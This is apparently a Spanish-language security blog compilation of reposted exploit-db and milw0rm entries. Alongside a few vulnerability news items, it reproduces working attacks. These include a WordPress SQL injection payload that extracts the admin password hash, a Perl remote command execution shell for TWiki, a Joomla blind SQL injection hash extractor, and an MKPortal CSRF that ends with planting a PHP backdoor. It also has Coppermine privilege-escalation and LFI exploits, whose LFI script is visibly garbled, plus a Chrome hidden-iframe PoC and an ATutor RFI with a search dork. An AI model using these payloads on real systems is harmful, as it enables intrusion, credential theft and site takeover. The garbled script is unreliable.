SQL injection vulnerability in do_trackbacks() Wordpress function

Description: SQL injection vulnerability in do_trackbacks() function of WordPress allows remote attackers to execute arbitrary SELECT SQL query.
Access Vector: Network
Attack Complexity: Medium
Authentication: Single Instance
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None

UPDATE Dec 1, 2010: This vulnerability was first discovered by M4g and is described in this
article.

The do_trackbacks() function in wp-includes/comment.php does not properly escape the input that
comes from the user, allowing a remote user with publish_posts and edit_published_posts
capabilities to execute an arbitrary SELECT SQL query, which can lead to disclosure of any
information stored in the WordPress database.

function do_trackbacks($post_id) {
global $wpdb;

$post = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id) );
$to_ping = get_to_ping($post_id);
$pinged = get_pung($post_id);
if ( empty($to_ping) ) {
$wpdb->update($wpdb->posts, array('to_ping' => ''), array('ID' => $post_id) );
return;
}

if ( empty($post->post_excerpt) )
$excerpt = apply_filters('the_content', $post->post_content);
else
$excerpt = apply_filters('the_excerpt', $post->post_excerpt);
$excerpt = str_replace(']]>', ']]>', $excerpt);
$excerpt = wp_html_excerpt($excerpt, 252) . '...';

$post_title = apply_filters('the_title', $post->post_title);
$post_title = strip_tags($post_title);

if ( $to_ping ) {
foreach ( (array) $to_ping as $tb_ping ) {
$tb_ping = trim($tb_ping);
if ( !in_array($tb_ping, $pinged) ) {
trackback($tb_ping, $post_title, $excerpt, $post_id);
$pinged[] = $tb_ping;
} else {
$wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) );
}
}
}
}

The $tb_ping variable is passed to the query in line 1657 unescaped.

Exploitation. The logged in user must have publish_posts and edit_published_posts capabilities
(this corresponds to the Author role).

First, the user creates a new post (title/content does not matter); text to put into the “Send Trackbacks” field is:

AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’

and publishes it. He needs to wait a bit — for wp-cron.php to process the trackback. The get_to_ping() function says that this trackback is to be processed:

AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'

Then the user goes back and edits the post.

Now the user duplicates the text in the “Send Trackbacks” field and updates the post:

AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’

AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’

The get_to_ping() function says that these trackbacks are to be processed:

AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'

AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'

Query logging shows that WordPress executes this query (reformatted for the sake of readbility):

UPDATE wp_posts
SET to_ping = TRIM(REPLACE(to_ping, 'AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'', ''))
WHERE ID = 11

After that when the user refreshes the page (he may need to wait a bit for wp-cron.php to complete), the admin information is shown in the input box.

Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed.
The screenshots above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.

Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed.
The examples above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.

Patch: below is the patch against WordPress 3.1 rev. 16609 that fixes the vulnerability:

Index: wp-includes/comment.php
===================================================================
--- wp-includes/comment.php (revision 16609)
+++ wp-includes/comment.php (working copy)
@@ -1723,7 +1723,7 @@
trackback($tb_ping, $post_title, $excerpt, $post_id);
$pinged[] = $tb_ping;
} else {
- $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) );
+ $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, %s, '')) WHERE ID = %d", $tb_ping, $post_id) );
}
}
}

Original de: http://www.exploit-db.com/exploits/15684/

Android 2.0-2.1 Reverse Shell Exploit

Lo dicho, la dirección del recurso si lo desean probar es

http://www.exploit-db.com/exploits/15423/

Saludos!!

Microsoft publica una alerta por vulnerabilidad 0-day en Internet Explorer

Microsoft acaba de publicar un aviso de seguridad para informar y alertar sobre una nueva vulnerabilidad descubierta recientemente en su navegador y que podría permitir la ejecución remota de código arbitrario.

Se anuncian como vulnerables las versiones de Internet Explorer 6, 7 y 8, mientras que la beta de Internet Explorer 9 se libra de este problema. Según reconoce Microsoft en su aviso, en la actualidad la vulnerabilidad se está explotando de forma activa.

El problema reside en que Internet Explorer al procesar determinadas combinaciones de hojas de estilo asigna la memoria de forma incorrecta. Concretamente en el módulo "mshtml.dll" al procesar el atributo "clip" con una posición determinada de las CSS (Cascading Style Sheets). Esto podría permitir a un atacante remoto la ejecución de código arbitrario a través de una página específicamente manipulada.

Microsoft se encuentra desarrollando las actualizaciones necesarias para corregir este problema, mientras tanto como contramedida se recomienda anular las hojas de estilo con una CSS definida por el usuario, asignar las zonas de seguridad del navegador a un nivel Alto, implementar el Enhanced Mitigation Experience Toolkit (EMET) o habilitar Data Execution Prevention (DEP) para Internet Explorer 7.

Más Información:

Microsoft Security Advisory (2458511)

Vulnerability in Internet Explorer Could Allow Remote Code Execution

http://www.microsoft.com/technet/security/advisory/2458511.mspx

DEP, EMET protect against attacks on the latest Internet Explorer vulnerability

http://blogs.technet.com/b/srd/archive/2010/11/03/dep-emet-protect-against-attacks-on-the-latest-internet-explorer-vulnerability.aspx

Microsoft advierte: Presionar F1 en Internet Explorer es peligroso

Microsoft ha alertado esta semana a sus usuarios de Windows XP sobre el peligro de hacer caso a los sitios web que les solicitan que pulsen la tecla de ayuda’F1′, ya que, de hacerlo, podrían sufrir graves problemas de seguridad. Se trata de una vulnerabilidad sin parche que los hackers pueden emplear para secuestrar PCs con Internet Explorer (IE).

En un aviso de seguridad publicado esta semana -después de que el investigador polaco Maurycy Prodeus revelara el fallo el viernes- Microsoft explicó que existe una vulnerabilidad de VBScript que podría hacer que algunos sitios web “ejecuten código de seguridad del usuario”, o lo que es lo mismo, que logren hacerse con el control de ordenadores de extraños sin que medie el consentimiento del propietario.

Según recoge ‘Portaltic.es’ de ‘ComputerWorld’, en el mismo comunicado Microsoft ofrecía algunos consejos sobre cómo proteger los ordenadores hasta que el parche de seguridad fuera enviado.

“La vulnerabilidad se encuentra en la forma en la que VBScrip interactúa con los archivos de Ayuda de IE”, explicaba el aviso de seguridad. “Si un sitio web malicioso muestra un cuadro de diálogo especialmente diseñado y el usuario pulsa la tecla ‘F1′, código arbitrario podría ser ejecutado en el contexto de seguridad del usuario”.

Esta vulnerabilidad afecta a ordenadores con sistemas operativos Windows 2000, Windows Server 2003 y Windows XP -mientras se usa Internet Explorer en cualquiera de sus versiones- explicó la compañía.

De momento, y hasta que el parche de seguridad esté disponible, Microsoft ha aconsejado a sus usuarios que no pulsen F1 cuando un sitio web se lo solicite, ya que si no se presiona esta tecla -la vulnerabilidad no puede ser aprovechada- además, alertan de que el cuadro de diálogo puede aparecer en repetidas ocasiones. Además, los usuarios pueden proteger sus ordenadores desactivando la ayuda de Windows.

Según publica ‘Computer World’, un alto directivo del Microsoft Security Response Center (MSRC), Jerry Bryant, aseguró en un e-mail que la compañía “está preocupada porque esta vulnerabilidad no fuera revelada de una manera responsable, lo que podría poner en riesgo a los clientes”.

Bryan afirmó que Microsoft no ha fijado un calendario para una revisión, y sólo dijo que “Microsoft tomará medidas apropiadas para ayudar a proteger a sus clientes”.

Vista en: Noticiasdot

Nuevo 0-day en Microsoft Internet Explorer

Microsoft informa de una vulnerabilidad en el navegador Internet Explorer que podría permitir a un atacante remoto ejecutar código arbitrario, con los permisos del usuario, a través de un sitio web especialmente manipulado.

La vulnerabilidad, a la que se le ha asignado el CVE-2010-0806, se encuentra en "iepeers.dll" y está causada por un puntero inválido al que se podría acceder, bajo ciertas condiciones, tras liberar el objeto apuntado.

Microsoft ha detectado y confirma que la vulnerabilidad está siendo explotada activamente. Se consideran vulnerables las versiones 6 y 7.

Se recomienda seguir las indicaciones de Microsoft a fin de minimizar el impacto. Microsoft está trabajando para publicar un parche que solucione esta vulnerabilidad.

Más Información:

Microsoft Security Advisory (981374)

http://www.microsoft.com/technet/security/advisory/981374.mspx

Security Advisory 981374 Released (blog MSRC)

http://blogs.technet.com/msrc/archive/2010/03/09/security-advisory-981374-released.aspx

Vulnerabilidad de ejecución de código en Google Picasa

Se ha descubierto una vulnerabilidad en Google Picasa por la que un usuario remoto podría lograr la ejecución de código en el sistema de los usuarios.

Picasa es un software de tratamiento y gestión de fotografías de Google, con el que se puede organizar, editar e imprimir las fotos del ordenador.

El problema consiste en que un usuario remoto podría crear una imagen en formato jpeg de tal forma, que cuando fuera cargada por el usuario atacado y este realice cualquier acción se provoque un desbordamiento de entero en "PicasaPhotoViewer.exe" y la ejecución de código en el sistema del usuario. El código se ejecutará con los privilegios del usuario.

Aunque no ha realizado ninguna comunicación al respecto, Google ha publicado una versión que corrige el problema (3.6 build 105.41).


Google Picasa Integer Overflow in Processing JPEG Images Lets Remote Users Execute Arbitrary Code
http://securitytracker.com/alerts/2010/Feb/1023652.html

Femitter Server FTP 1.x Multiple Vulnerability

Femitter Server FTP 1.x Multiple Vulnerability
----------------------------------------------------

Arbitrary:
----------
The vulnerability is caused due to an input validation error when processing FTP requests. This can be
exploited to read, modify, or delete arbitrary files from the affected system via directory traversal
attacks.

Remote Crash:
-------------
The vulnerability is caused due to an error in handling the RETR command. This can be exploited to crash
the FTP service by sending the "RETR" command without sending the "PORT" command.

IncrediMail Xe (latest version) XSS Vulnerability

#!/usr/bin/perl -w

# IncrediMail Xe (latest version) XSS Vulnerability
#
# Discovered by : Bui Quang Minh
#
# Description : The most of popular Mail Client now exclude Script Code for mail content.
# It aims to avoid the type of XSS exploitation (For e.g: stolen cookie).
# IncrediMail also remove Script Code when the user read mail.
# However, I found the "Reply" and "Forward" function of the mail client
# has not handled mail content well resulting in XSS vulnerability.

Más detalles: http://www.milw0rm.com/exploits/8284

Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation

+--------------------------------------------------------------------------+
| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
+--------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it |
| http://coppermine-gallery.net |
| Don't add me on msn messenger. |
| This vulnerability can be named as "bbcode img tag script injection" |
+--------------------------------------------------------------------------+
| Proof of Concept (an example,to understand it) |
+--------------------------------------------------------------------------+
URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
[img]URL[/img]
+--------------------------------------------------------------------------+
| Modify [ID] with your user id. |
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id] |
+--------------------------------------------------------------------------+
Insert the below code into a new message

hey admin,nice web site :)
[img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]

+-------------------------------------------------------------------------+
| The fake image doesn't show errors,you'll see "hey admin,nice web site" |
| You'll become admin when the real admin will visit the page |
+-------------------------------------------------------------------------+

# milw0rm.com [2009-02-26]

Simple Machines Forum Password Reset Security Bypass Vulnerability

Bugtraq ID:	33219
Class:	Access Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Jan 12 2009 12:00AM
Updated:	Feb 06 2009 11:18PM
Credit:	Xianur0
Vulnerable:	Simple Machines SMF 1.1.5 Simple Machines SMF 1.1.5 Simple Machines SMF 1.1.4 Simple Machines SMF 1.1.3 Simple Machines SMF 1.1.2 Simple Machines SMF 1.1.1 Simple Machines SMF 1.1 rc3 Simple Machines SMF 1.1 rc3 Simple Machines SMF 1.1 rc2 Simple Machines SMF 1.1 rc1 Simple Machines SMF 1.1 final Simple Machines SMF 1.0.13 Simple Machines SMF 1.0.13 Simple Machines SMF 1.0.12 Simple Machines SMF 1.0.12 Simple Machines SMF 1.0.11 Simple Machines SMF 1.0.10 Simple Machines SMF 1.0.9 Simple Machines SMF 1.0.8 Simple Machines SMF 1.0.8 Simple Machines SMF 1.0.7 Simple Machines SMF 1.0.6 Simple Machines SMF 1.0.5 Simple Machines SMF 1.0.4 Simple Machines SMF 1.0.3 Simple Machines SMF 1.0.2 Simple Machines SMF 1.0.1 Simple Machines SMF 1.0 -beta5p Simple Machines SMF 1.0 -beta4p Simple Machines SMF 1.0 -beta4.1 Simple Machines Simple Machines Forum 1.1.5 Simple Machines Simple Machines Forum 1.1.4 Simple Machines Simple Machines Forum 1.1.3 Simple Machines Simple Machines Forum 1.1.2 Simple Machines Simple Machines Forum 1.1.1
Not Vulnerable:	Simple Machines Simple Machines Forum 1.1.6 Simple Machines Simple Machines Forum 1.0.14

Attackers can exploit this issue via a browser.

The following exploit code is available:

http://www.securityfocus.com/data/vulnerabilities/exploits/33219.pl

Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC

Try this:

chromehtml:"%20--renderer-path="calc"%20--no-sandbox

Disabling sandbox does matter :)
Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...

Full PoC:

<title>Chrome URI Handler Remote Command Execution PoC</title>

<h3>This is a test</h3>
<iframe src="chromehtml:%22%20--renderer-path=%22calc%22%20--no-sandbox" width="0" height="0"></iframe>


# milw0rm.com [2009-01-30]

TWiki <= 4.0.4 (configure) - Remote Command Execution Exploit - Ejecucion de codigo remoto

#!/usr/bin/perl
# Tue Aug 1 13:18:12 CEST 2006 jolascoaga@514.es
use strict;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Request;
use HTTP::Response;
use Getopt::Long;
$| = 1; # couse 1 is bigger than 0
my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$dir, $command);
my $options = GetOptions (
'host=s' => \$host,
'dir=s' => \$dir,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'debug' => \$debug);
&help unless ($host); # you dont need root
$dir = "/twiki/bin/configure" unless($dir); # ... we have a template for this
print "$host - $dir\n";
while () {
print "tinkiwinki> "; # phf haquerz style
while() {
$command=$_;
chomp($command);
last;
}
&send($command);
}

sub send {
my ($cmd) = @_;
my $ok = 0;
my $socket;
LWP::Debug::level('+') if $debug; # but remember this is crap :D
my $ua = new LWP::UserAgent();
$ua->agent("safari/zoo");
if ($host !~ /^http/) {
$host = sprintf ("http://%s", $host); # CRAP CRAP CRAP
}
my $req = HTTP::Request->new(POST => $host.$dir);
$req->content('action=update&TYPEOF%3A%29%3Bsystem%28%27'.$cmd.'%27%29%3Bmy+@a%3D%28=anything&submit=Submit');
$ua->proxy(['http'] => $proxy) if $proxy;
$req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
print $req->as_string() if $debug;
my $res = $ua->request($req);
my $html = $res->content();
$html =~ m/(.*?)

print $1."\n";
if ($debug) {
open (DEBG, ">wikidebug");
print DEBG $html;
}
}
sub help {
print "Syntax: ./$0 --host=url --dir=/horde [options]\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--debug\n";
print "the default directory is /twiki/bin/configure\n";
print "\nExample\n";
print "bash# $0 --host=http(s)://www.server.com/\n";
print "\n";
exit(1);
}
exit 0;
#

# milw0rm.com [2006-08-07]

Todos los invitados pueden ser administradores en MKPortal

De: <info_at_burnhead.it>
Fecha: 4 Jun 2007 04:09:19 -0000

('binary' encoding is not supported, stored as-is) MkPortal "All Guests are Admin" Exploit

Vulnerabilidad descubierta y explotada por: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it

How to create exploit/Como crear exploit:

Inicia Macromedia Flash y crea un archivo swf con este codigo:

var idg:Number = 9;
var p13:Number = 1;
var Salva:String = "Save+Permissions";
getURL("http://victim.com/mkportal/admin.php?ind=ad_perms&op=save_main", "_self", "POST");

Traduce "Save+Permissions" en el idioma de MKPortal.
Ejemplo: "Salva+questi+permessi" para sitios italianos.

Entonces sube el archivo swf a un servidor web y crea una pagina html con el codigo similar al siguiente:

<iframe src="http://yoursite.com/exploit.swf" frameborder="0" height="0" width="0"></iframe>

Now send the html page to MKPortal administrator.
When admin opens the page all guests will be able to administrate MKPortal.

So you can go here: http://victim.com/mkportal/admin.php?ind=ad_contents&op=contents_new_php
and paste a php shell or a backdoor.
You can find your shell here: http://victim.com/mkportal/cache/ppage_*.php
where * is the ID of the page.

Translate "page" in MKPortal language.
Example: "pagina" for italian sites.
Received on Jan 04 2007

ATutor Course Server Rfi

#####################################################################################
####                         ATutor Course Server Rfi                            ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm)                                                        #
#Discovered by : IRCRASH (R3d.W0rm)                                                 #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm                                         #
#####################################################################################
#                                                                                   #
#Script Download : www.atutor.ca                                                    #
#                                                                                   #
#DORK : "Web site engine's code is copyright © 2001-2007 ATutor®"                   #
#                                                                                   #
#Note : You must login , then use rfi bug  ;)                                       #
#####################################################################################
#                                       [Rfi]                                       #
#                                                                                   #
#http://Example/tools/packages/import.php                                           #
#                                                                                   #
#                                    [Valun Code]                                   #
#  ....                                                                             #
# if (isset ($_POST['type'])) {                                                     #
# require ($_POST['type'] . '/import.php');                                   #
#}                                                                                  #
#  ....                                                                             #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-07-28]

Coppermine Photo Gallery <= 1.4.18 LFI / Remote Code Execution Exploit

authenticate();
 
 [...]
 
 301. // Process language selection if present in URI or in user profile or try
 302. // autodetection if default charset is utf-8
 303. if (!empty($_GET['lang']))
 304. {
 305.         $USER['lang'] = ereg("^[a-z0-9_-]*$", $_GET['lang']) ? $_GET['lang'] : $CONFIG['lang'];
 306. }
 307. 
 308. if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php'))
 309. {
 310.         $CONFIG['default_lang'] = $CONFIG['lang'];          // Save default language
 311.         $CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');
 312. }
 313. elseif ($CONFIG['charset'] == 'utf-8') <====== [2]  314. {  315.         include('include/select_lang.inc.php');  316.         if (file_exists('lang/' . $USER['lang'] . '.php'))  317.         {  318.                 $CONFIG['default_lang'] = $CONFIG['lang'];      // Save default language  319.                 $CONFIG['lang'] = $USER['lang'];  320.         }  321. }  322. else  323. {  324.         unset($USER['lang']);  325. }  326.   327. if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang']))  328. {  329.                 unset($CONFIG['default_lang']);  330. }  331.   332. if (!file_exists("lang/{$CONFIG['lang']}.php"))  333.   $CONFIG['lang'] = 'english';  334.   335. // We load the chosen language file  336. require "lang/{$CONFIG['lang']}.php"; <======== [3]   if $CONFIG['charset'] is set to 'utf-8' [2] (this is the default configuration), an attacker could be able to  include an arbitrary local file through the require() at line 336 [3], due to $USER array can be manipulate by  cookies (see user_get_profile() function [1] defined into /include/functions.inc.php, near lines 128-146)    [-] Path disclosure in /themes/sample/theme.php    [-] Possible bug fix in /include/functions.inc.php    128. function user_get_profile()  129. {  130.         global $CONFIG, $USER;  131.     132.  if (isset($_COOKIE[$CONFIG['cookie_name'].'_data'])) {  133.   $USER = @unserialize(@base64_decode($_COOKIE[$CONFIG['cookie_name'].'_data']));  134.   $USER['lang'] = ereg("^[a-z0-9_-]*$", $USER['lang']) ? $USER['lang'] : $CONFIG['lang'];  135.         }   */  error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5);  define(STDIN, fopen("php://stdin", "r"));  function http_send($host, $packet) {  $sock = fsockopen($host, 80);  while (!$sock)  {   print "\n[-] No response from {$host}:80 Trying again...";   $sock = fsockopen($host, 80);  }  fputs($sock, $packet);  while (!feof($sock)) $resp .= fread($sock, 1024);  fclose($sock);  return $resp; }  function get_info() {  global $host, $path, $cookie, $version, $path_disc;    $packet  = "GET {$path} HTTP/1.0\r\n";  $packet .= "Host: {$host}\r\n";  $packet .= "Connection: close\r\n\r\n";  $html  = http_send($host, $packet);    preg_match("/Set-Cookie: (.*)_data/", $html, $match);  $cookie = $match[1];    preg_match("/(.*)themes/", http_send($host, $packet), $match);
 $path_disc = $match[1];
}

function get_logs()
{
 $logs[] = "/apache/logs/access.log";
 $logs[] = "/apache2/logs/access.log";
 $logs[] = "/apache/log/access.log";
 $logs[] = "/apache2/log/access.log";
 $logs[] = "/logs/access.log";
 $logs[] = "/var/log/apache/access.log";
 $logs[] = "/var/log/apache2/access.log";
 $logs[] = "/var/log/access.log";
 $logs[] = "/var/www/logs/access.log";
 $logs[] = "/var/www/log/access.log";
 $logs[] = "/var/log/httpd/access.log";
 $logs[] = "/etc/httpd/logs/access.log";
 $logs[] = "/usr/local/apache/logs/access.log";
 $logs[] = "/usr/local/apache2/logs/access.log";
 
 for ($i = 0, $climb = "../.."; $i < packet  = "GET {$path}proof.php HTTP/1.0\r\n" logs =" get_logs();" data =" base64_encode(serialize(array("> md5(time()), "am" => 1, "lang" => $_log.chr(0))));
  
  $packet  = "GET {$path} HTTP/1.0\r\n";
  $packet .= "Host: {$host}\r\n";
  $packet .= "Cookie: {$cookie}_data={$data}\r\n";
  $packet .= "Connection: close\r\n\r\n";
  $resp  = http_send($host, $packet);
  
  if (!preg_match("/f=fopen/", $resp) && preg_match("/_LfI_/", $resp)) return true;
  
  sleep(1);
 }
 
 return false;
}

print "\n+-------------------------------------------------------------------------+";
print "\n| Coppermine Photo Gallery <= 1.4.18 LFI / Code Execution Exploit by EgiX |"; print "\n+-------------------------------------------------------------------------+\n";  if ($argc < host =" $argv[1];" path =" $argv[2];" code =" base64_decode(" packet  = "GET {$path}{$code} HTTP/1.0\r\n" cmd =" trim(fgets(STDIN));" packet = "GET {$path}proof.php HTTP/1.0\r\n">

# milw0rm.com [2008-07-31]

Joomla Component EZ Store Blind SQL Injection Exploit

#!/usr/bin/perl
#Note:Sometimes you have to change the regexp to  viewcategory/catid,".$cid."
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
print "                                                                  \n";
 print "   ################################################################\n";
print "   #   Joomla Component EZ Store Blind SQL Injection Exploit      #\n";
print "   #   Author:His0k4 [ALGERIAN HaCkeR]                            #\n";
print "   #                                                              #\n";
print "   #   Conctact: His0k4.hlm[at]gamil.com                          #\n";
print "   #   Greetz:   All friends & muslims HacKeRs                    #\n";
print "   #   Greetz2:  http://www.dz-secure.com                         #\n";
print "   #                                                              #\n";
print "   #   Dork:    inurl:com_ezstore                                 #\n";
print "   #   Usage:   perl ezstore.pl host path                #\n";
print "   #   Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2  #\n";
print "   #                                                              #\n";
print "   #   Options:                                                   #\n";
print "   #     -t    Valid  procuct id                                  #\n";
print "   #     -c    Category value of the following  product id        #\n";
print "   ################################################################\n";

exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $cid     = $ARGV[2];
my $pid     = $ARGV[3];

my %options = ();
GetOptions(\%options, "c=i", "x=s", "p=i");

print "[~] Exploiting...\n";

if($options{"c"})
{
$cid = $options{"c"};
}

if($options{"p"})
{
$pid = $options{"p"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++) {  my $f = 0;  my $h = 48;  while(!$f && $h <= 57)  {    if(istrue2($host, $path, $cid, $pid, $i, $h))    {      $f = 1;      syswrite(STDOUT, chr($h), 1);    }    $h++;  }  if(!$f)  {    $h = 97;    while(!$f && $h <= 122)    {      if(istrue2($host, $path, $cid, $pid, $i, $h))      {        $f = 1;        syswrite(STDOUT, chr($h), 1);      }      $h++;    }  } }  print "\n[~] Exploiting done\n";  sub istrue2 {  my $host  = shift;  my $path  = shift;  my $cid   = shift;  my $pid   = shift;  my $i     = shift;  my $h     = shift;   my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";

if($options{"x"})
{
 $ua->proxy('http', "http://".$options{"x"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "viewcategory&catid=".$cid."";

if($content =~ /$regexp/)
{
 return 1;
}
else
{
 return 0;
}

}

# milw0rm.com [2008-08-03]

Diccionario informatico: Script kiddie

Script kiddie:

Un Script Kiddie es un cracker inexperto que usa programas, scripts, exploits, troyanos, nukes, etc. creados por terceros para romper la seguridad de un sistema. Suele presumir de ser un hacker o cracker cuando en realidad no posee un grado relevante de conocimientos.
Forma parte de los grupos de la sociedad underground, y se caracteriza por:
Tener conocimientos poco profundos sobre informática.
Usar «cracks» o «exploits» como única forma de entrar en sistemas remotos.
Aprovecharse de la ignorancia de sus víctimas.
Amenazar de forma constante a otros con "hackearlos".
Algunos utilizan el termino "Homer" de Homer Simpson + Hacker como sinónimo de script Kiddie.

De wikipedia, la enciclopedia libre.